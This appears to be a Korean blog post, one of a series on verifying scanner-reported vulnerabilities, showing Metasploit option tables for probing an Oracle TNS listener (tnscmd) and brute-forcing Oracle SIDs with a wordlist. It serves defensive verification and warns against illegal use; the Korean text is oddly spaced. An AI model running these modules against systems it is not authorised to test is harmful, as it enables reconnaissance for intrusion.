8. 구멍 검증 시리즈 -- Oracle 원 격 감청 투 독 구멍

이 시 리 즈 는 일정한 네트워크 보안 기반 을 가 진 사람들 이 일상 업무 에서 스 캔 한 여러 가지 구멍 에 대해 어떻게 검증 하여 이 구멍 이 존재 하거나 스캐너 의 오보 여 부 를 구분 하 는 데 목적 을 둔다.불법 경 로 를 사용 하지 마 십시오.
이 구멍 은 Oacle 의 메모리 정 보 를 원 격 으로 얻 을 수 있 으 며, 검증 방법 은 msf 의 구멍 모듈 을 사용 합 니 다.

msf auxiliary(admin/oracle/tnscmd) > show options 

Module options (auxiliary/admin/oracle/tnscmd):

   Name   Current Setting                   Required  Description
   ----   ---------------                   --------  -----------
   CMD    (CONNECT_DATA=(COMMAND=VERSION))  no        Something like ping, version, status, etc..
   RHOST                                    yes       The target address
   RPORT  1521                              yes       The target port (TCP)

메모리 에 있 는 데 이 터 를 가 져 올 수 있다 면 구멍 이 있 습 니 다.
더 깊이 파고 들 면 Oacle 의 SID 도 얻 을 수 있 습 니 다.

msf > use auxiliary/admin/oracle/sid_brute
msf auxiliary(admin/oracle/sid_brute) > show options 

Module options (auxiliary/admin/oracle/sid_brute):

   Name     Current Setting                                                      Required  Description
   ----     ---------------                                                      --------  -----------
   RHOST                                                                         yes       The target address
   RPORT    1521                                                                 yes       The target port (TCP)
   SIDFILE  /opt/metasploit-framework/embedded/framework/data/wordlists/sid.txt  no        The file that contains a list of sids.
   SLEEP    1                                                                    no        Sleep() amount between each request.